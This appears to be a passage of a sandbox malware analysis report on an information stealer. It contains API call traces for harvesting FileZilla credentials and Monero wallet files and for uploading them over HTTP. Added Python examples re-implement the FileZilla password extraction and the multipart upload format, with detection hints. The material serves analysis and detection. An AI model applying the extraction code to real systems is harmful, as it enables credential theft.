                              • Instruction Fuzzy Hash: 6811C9B8A00209EFDB04DF94D989EAEB7B5FF88304F1045A8E915A7350D774AE10CFA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: N`~.$w8~o
                              • API String ID: 0-623062728
                              • Opcode ID: d1b729b843906b63bf8021ad4ee565629d66dcb6790f25465a0de372ca6ad224
                              • Instruction ID: 5c7fd827cfe0edc05a87c75515abb4dc3d5fbe7ee83deb62b19749788762685d
                              • Opcode Fuzzy Hash: d1b729b843906b63bf8021ad4ee565629d66dcb6790f25465a0de372ca6ad224
                              • Instruction Fuzzy Hash: 0DB2F5F3A0C2049FE304AE2DEC8567AFBE9EF94720F1A492DE6C4C7744E63558058697
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: O2q$g"j
                              • API String ID: 0-1449817455
                              • Opcode ID: 01ea12b7779dbd9a8dfc913e45f1d603ec399cac09f85235e719bc2c84a083c7
                              • Instruction ID: a798062fbcff879947c6ac289a131c65493766102f0e42b767775b01ffb7246a
                              • Opcode Fuzzy Hash: 01ea12b7779dbd9a8dfc913e45f1d603ec399cac09f85235e719bc2c84a083c7
                              • Instruction Fuzzy Hash: AC51C1B390C3149FE3116E6ADC8176AF7E9EF84720F1A493DDAC4D7340E6755C409A86
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID: 39{
                              • API String ID: 0-1237294677
                              • Opcode ID: 85435a2dfa228bdd1d06a00b334052c2e351a922550b70f015c32e4259fcb9e8
                              • Instruction ID: 63c290594b87a2e3faedb2e744ae1533e9c2398d5206d70d5c57b1185e1b617e
                              • Opcode Fuzzy Hash: 85435a2dfa228bdd1d06a00b334052c2e351a922550b70f015c32e4259fcb9e8
                              • Instruction Fuzzy Hash: 7C5168F3A082145FE3146E3CEDD837AB7DAEB94720F1B423DDB8493784E93958058286
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fcee6f71bc6b36c8718b2430bcc608d9adb577d5efaeb8f86e61f95df809940b
                              • Instruction ID: 6defc6045eaa5d1f1c10f512c3af5c4c01f5d6eb5da187b9617e9e49a8f09f21
                              • Opcode Fuzzy Hash: fcee6f71bc6b36c8718b2430bcc608d9adb577d5efaeb8f86e61f95df809940b
                              • Instruction Fuzzy Hash: 415106F3F186108FF3185A69DC8076AB7D7EBD4321F2B853DDA8997384E9785C028685
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b94ba8eb9fa7ec756655e1f15eb381e0e8644b3063c6d4c3b506787f1660b47f
                              • Instruction ID: a75b6db55685264a0b4ac7ec16ffca54066042aa5a0ce68b8f68e6ee423c61dc
                              • Opcode Fuzzy Hash: b94ba8eb9fa7ec756655e1f15eb381e0e8644b3063c6d4c3b506787f1660b47f
                              • Instruction Fuzzy Hash: 29518DF3A482009BF308AD3DEC9977B7BD5DB94360F1A863DDA85C7744F93899064192
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ab69d650f8b5f2d63e351cc8892ce6c9ad3957f611e1daa06556767b30b2d0dd
                              • Instruction ID: 037d1d03dfeecc1cd8a343bab1dfa916e74d1b5c8e774eaeba142a9f6b5683c4
                              • Opcode Fuzzy Hash: ab69d650f8b5f2d63e351cc8892ce6c9ad3957f611e1daa06556767b30b2d0dd
                              • Instruction Fuzzy Hash: 2751C5F3A187009BE708AF29DC8537EB7D6ABC4320F1A893DDAC993784D57958418687
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c387637aad3a47a1d78d03f9572df1a50e217a5f3ed0e86ec28a48af85e93862
                              • Instruction ID: b14684f2d490170cd0cb7e8f20027a47a72a947043478ceb34816e8e92ea17ea
                              • Opcode Fuzzy Hash: c387637aad3a47a1d78d03f9572df1a50e217a5f3ed0e86ec28a48af85e93862
                              • Instruction Fuzzy Hash: 6331D3F3D086109FF3189A29DC4536AB7E5EFC4720F16C63DEAD897384E9385C018696
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                                • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                                • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                                • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                                • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                                • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                                • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,001E0DBA,001E0DB7,001E0DB6,001E0DB3), ref: 001D0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001D0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 001D0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 001D03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 001D0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 001D0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 001D0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 001D0571
                              • lstrcat.KERNEL32(?,url: ), ref: 001D0580
                              • lstrcat.KERNEL32(?,00000000), ref: 001D0593
                              • lstrcat.KERNEL32(?,001E1678), ref: 001D05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 001D05B5
                              • lstrcat.KERNEL32(?,001E167C), ref: 001D05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 001D05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 001D05E6
                              • lstrcat.KERNEL32(?,001E1688), ref: 001D05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 001D0604
                              • lstrcat.KERNEL32(?,00000000), ref: 001D0617
                              • lstrcat.KERNEL32(?,001E1698), ref: 001D0626
                              • lstrcat.KERNEL32(?,001E169C), ref: 001D0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,001E0DB2), ref: 001D068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 29a2dc6766bc0f5521f78971a7ca81630ee790383eaa77ca01f88278d74d3162
                              • Instruction ID: c1f8b3d8e6149ae0aec6b88e9107466df2d40286c3447a3cdd0c40dc5aaf1f1c
                              • Opcode Fuzzy Hash: 29a2dc6766bc0f5521f78971a7ca81630ee790383eaa77ca01f88278d74d3162
                              • Instruction Fuzzy Hash: 8CD11172900248ABCB04EBF4DD96EEE7338BF68301F808519F502B7191DF74AA45DB66
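The call listing above is the FileZilla credential routine: it reads \AppData\Roaming\FileZilla\recentservers.xml, locates <Host>, <Port>, <User> and <Pass encoding="base64"> with StrStrA, and concatenates the result as browser/profile/url/login/password lines. The Python below is an added example written for this page, not code from the report or from the sample; it reproduces that scan on a constructed recentservers.xml so an analyst can see exactly what is recoverable from the file. The separators between host and port and between output lines are assumptions (the listing shows only unresolved pointers for them), and the sample file contents are constructed.

```python
import base64
import binascii
from typing import Optional

# Constructed sample (not a real capture) of %APPDATA%\FileZilla\recentservers.xml.
# FileZilla stores the password base64-encoded unless a master password is set,
# in which case the element carries a different encoding attribute and is not
# decodable offline. The second entry models that case.
SAMPLE_RECENTSERVERS = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
    <RecentServers>
        <Server>
            <Host>ftp.example.test</Host>
            <Port>21</Port>
            <Protocol>0</Protocol>
            <User>deploy</User>
            <Pass encoding="base64">aHVudGVyMg==</Pass>
            <Logontype>1</Logontype>
        </Server>
        <Server>
            <Host>sftp.internal.test</Host>
            <Port>22</Port>
            <Protocol>1</Protocol>
            <User>svc_backup</User>
            <Pass encoding="crypt" salt="c2FsdA==">AAAA</Pass>
            <Logontype>1</Logontype>
        </Server>
    </RecentServers>
</FileZilla3>
"""


def _between(buf: str, start_tag: str, end_tag: str) -> Optional[str]:
    """StrStrA-style scan: text between the first start_tag and the next end_tag."""
    i = buf.find(start_tag)
    if i < 0:
        return None
    i += len(start_tag)
    j = buf.find(end_tag, i)
    return None if j < 0 else buf[i:j]


def _server_blocks(xml_text: str):
    """Yield each <Server>...</Server> body so a missing tag cannot bleed into the next entry."""
    pos = 0
    while True:
        i = xml_text.find("<Server>", pos)
        if i < 0:
            return
        j = xml_text.find("</Server>", i)
        if j < 0:
            return
        yield xml_text[i + len("<Server>"):j]
        pos = j + len("</Server>")


def parse_recentservers(xml_text: str) -> list:
    """Recover host/port/user/password per entry using the same literal markers the listing searches for."""
    records = []
    for block in _server_blocks(xml_text):
        host = _between(block, "<Host>", "</Host>")
        if host is None:
            continue
        port = _between(block, "<Port>", "</Port>") or ""
        user = _between(block, "<User>", "</User>") or ""
        # Only the literal base64 form is searched, exactly as in the listing; any other
        # encoding (master-password protected entries) is left unrecovered.
        b64 = _between(block, '<Pass encoding="base64">', "</Pass>")
        password = None
        if b64 is not None:
            try:
                password = base64.b64decode(b64, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                password = None
        records.append({"host": host, "port": port, "user": user, "password": password})
    return records


def format_record(rec: dict) -> str:
    """Emit the layout the listing builds with lstrcat (separators ':' and newline are assumed)."""
    return (
        "browser: FileZilla\n"
        "profile: null\n"
        f"url: {rec['host']}:{rec['port']}\n"
        f"login: {rec['user']}\n"
        f"password: {rec['password'] if rec['password'] is not None else ''}\n"
    )


if __name__ == "__main__":
    for rec in parse_recentservers(SAMPLE_RECENTSERVERS):
        print(format_record(rec))
```

FileZilla's base64 is an encoding, not a protection: every saved server in this file yields its plaintext credential in one decode. An entry saved while a master password is enabled carries a different encoding attribute, which this scan, like the listed StrStrA search for the literal base64 form, leaves unrecovered.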
                              APIs
                                • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                                • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                                • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001C59F8
                              • StrCmpCA.SHLWAPI(?,014AE9B8), ref: 001C5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,014AEAD8,00000000,?,014AA7B0,00000000,?,001E1A1C), ref: 001C5E71
                              • lstrlen.KERNEL32(00000000), ref: 001C5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 001C5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001C5E9A
                              • lstrlen.KERNEL32(00000000), ref: 001C5EAF
                              • lstrlen.KERNEL32(00000000), ref: 001C5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001C5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 001C5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001C5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 001C5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 001C5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 001C5FBD
                              • HttpOpenRequestA.WININET(00000000,014AE9C8,?,014AE110,00000000,00000000,00400100,00000000), ref: 001C5BF8
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • InternetCloseHandle.WININET(00000000), ref: 001C5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006A0000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006AB000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771022720.00000000006BA000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771139237.000000000084F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1771155711.0000000000850000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 2e2ed8f9042e4a10c2b079edfa5d6521fd530cf5ddf87afff1f333820c1528fc
                              • Instruction ID: ed9f0a8606281f4ad8cade0029b5ed36666ac048492b81f12fc19aa194dd6780
                              • Opcode Fuzzy Hash: 2e2ed8f9042e4a10c2b079edfa5d6521fd530cf5ddf87afff1f333820c1528fc
                              • Instruction Fuzzy Hash: 0F122271820168ABDB19EBA0DCA5FEE7378BF24701F8041AAF50673191EF706A49CF55
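The WinINet sequence listed above (InternetOpenA with access type 1, INTERNET_OPEN_TYPE_DIRECT; InternetConnectA with service 3, INTERNET_SERVICE_HTTP; HttpOpenRequestA with flags 0x00400100, which is INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE; HttpSendRequestA; InternetReadFile in 0xC7-byte reads), together with the `"` and `------` string references, is the shape of a multipart/form-data upload built by hand. The Python below is an added example for this page, not code from the report or from the sample: it builds such a body with a dash-only boundary and parses one back the way a network analyst would from a captured request, then applies a boundary heuristic. The field names, the exact boundary and the payload are assumptions; the page does not show them.

```python
import re

# Boundary shapes that real browsers generate (Chromium/WebKit, Firefox). A client that
# assembles the body by hand from a fixed dash string produces something else.
_BROWSER_BOUNDARIES = (
    re.compile(r"^----WebKitFormBoundary[A-Za-z0-9]{16}$"),
    re.compile(r"^-{27}[0-9]+$"),
)


def build_multipart(fields: dict, boundary: str) -> tuple:
    """Return (Content-Type value, body) for a multipart/form-data POST.

    Each part is delimited by "--" + boundary; field names are quoted, which is
    where the '"' string in the listing comes from.
    """
    b = boundary.encode()
    parts = []
    for name, value in fields.items():
        parts.append(
            b"--" + b + b"\r\n"
            + b'Content-Disposition: form-data; name="' + name.encode() + b'"\r\n\r\n'
            + value + b"\r\n"
        )
    body = b"".join(parts) + b"--" + b + b"--\r\n"
    return b"multipart/form-data; boundary=" + b, body


def parse_multipart(content_type: bytes, body: bytes) -> dict:
    """Recover name -> value from a captured multipart body, tolerant of odd boundaries."""
    m = re.search(rb'boundary=("?)([^";\r\n]+)\1', content_type)
    if not m:
        raise ValueError("Content-Type carries no boundary")
    delim = b"--" + m.group(2)
    fields = {}
    for chunk in body.split(delim):
        if chunk.startswith(b"--"):
            break                                  # closing "--boundary--"
        chunk = chunk.removeprefix(b"\r\n")
        head, sep, value = chunk.partition(b"\r\n\r\n")
        if not sep:
            continue                               # preamble or empty fragment
        name = re.search(rb'name="([^"]*)"', head)
        if name:
            fields[name.group(1).decode()] = value.removesuffix(b"\r\n")
    return fields


def looks_like_browser_boundary(boundary: str) -> bool:
    """True when the boundary matches a browser-generated pattern; False for hand-rolled ones."""
    return any(p.match(boundary) for p in _BROWSER_BOUNDARIES)


if __name__ == "__main__":
    # Constructed payload: the kind of record the FileZilla routine emits, plus a host tag.
    ct, body = build_multipart(
        {"file": b"browser: FileZilla\nprofile: null\n", "hwid": b"ABCD1234"}, "------"
    )
    print(ct.decode())
    print(body.decode())
    print(parse_multipart(ct, body))
    print("browser-like boundary:", looks_like_browser_boundary("------"))
```

The boundary heuristic is the detection angle: browsers emit boundaries such as ----WebKitFormBoundary followed by 16 alphanumerics, while a client that only has a short dash string to work with yields boundaries that rarely appear in legitimate form posts from the same host. The Pragma: no-cache flag and the 0xC7-byte read loop are further features of the request that a rule can key on once the traffic is decrypted or the C2 is plain HTTP, as the INTERNET_SERVICE_HTTP argument indicates here.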
                              APIs
                                • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                                • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                                • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                                • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                                • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                                • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,014AA360,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,014A91F8,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                                • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                                • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CCF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001CD0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 001CD0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD208
                              • lstrcat.KERNEL32(?,001E1478), ref: 001CD217
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD22A
                              • lstrcat.KERNEL32(?,001E147C), ref: 001CD239
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD24C
                              • lstrcat.KERNEL32(?,001E1480), ref: 001CD25B
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD26E
                              • lstrcat.KERNEL32(?,001E1484), ref: 001CD27D
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD290
                              • lstrcat.KERNEL32(?,001E1488), ref: 001CD29F
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD2B2
                              • lstrcat.KERNEL32(?,001E148C), ref: 001CD2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 001CD2D4
                              • lstrcat.KERNEL32(?,001E1490), ref: 001CD2E3
                                • Part of subcall function 001DA820: lstrlen.KERNEL32(001C4F05,?,?,001C4F05,001E0DDE), ref: 001DA82B
                                • Part of subcall function 001DA820: lstrcpy.KERNEL32(001E0DDE,00000000), ref: 001DA885
                              • lstrlen.KERNEL32(?), ref: 001CD32A
                              • lstrlen.KERNEL32(?), ref: 001CD339
                                • Part of subcall function 001DAA70: StrCmpCA.SHLWAPI(014A8F48,001CA7A7,?,001CA7A7,014A8F48), ref: 001DAA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 001CD3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1770548297.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                               • Associated: 00000000.00000002.1770511538.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770548297.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.00000000005A8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1770738342.000000000067E000.00000040.00000001.01000000.00000003.sdmp
